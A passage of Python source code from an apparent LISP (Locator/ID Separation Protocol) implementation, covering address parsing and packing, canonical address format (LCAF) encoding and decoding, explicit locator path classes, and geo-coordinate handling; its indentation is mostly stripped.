return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = b""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += (self.address + "\0").encode()
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
            # Allow user to specify ff::/8 which allows for placing the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
            #endif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific than, or equal to, the prefix supplied in
# variable 'prefix'? Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate that there are enough bytes
# left in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and group address. Validate that there are enough bytes
# left in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = group.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return([None, None])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return([None, None])
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
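#
# Illustrative sketch (added for exposition; not called anywhere in this
# file): round-trip a prefix through store_prefix()/print_prefix() and
# test longest-match with is_more_specific(). The prefix strings and the
# function name are made-up examples.
#
def lisp_address_example():
    eid_prefix = lisp_address(LISP_AFI_NONE, "", 0, 0)
    eid_prefix.store_prefix("[1000]10.1.0.0/16")
    host_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
    host_eid.store_prefix("[1000]10.1.2.3/32")
    #
    # host_eid falls inside eid_prefix (same instance-id, covered by
    # the /16), so is_more_specific() returns True.
    #
    ms = host_eid.is_more_specific(eid_prefix)
    return([eid_prefix.print_prefix(), ms])
#enddef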
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node(object):
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.address.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp(object):
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to
# give it the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
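#
# Illustrative sketch (added for exposition; not called anywhere in this
# file): build a 3-hop ELP and render it with print_elp(). The RLOC
# addresses are made-up; each node prints as address(R|r P|p S|s) flags
# as formatted above.
#
def lisp_elp_example():
    elp = lisp_elp("example-elp")
    for addr_str in ["1.1.1.1", "2.2.2.2", "3.3.3.3"]:
        elp_node = lisp_elp_node()
        elp_node.address.store_address(addr_str)
        elp.elp_nodes.append(elp_node)
    #endfor
    return(elp.print_elp(False))   # "1.1.1.1(Rps), 2.2.2.2(Rps), ..."
#enddef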
class lisp_geo(object):
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0) # set by decode_geo()
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == None or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
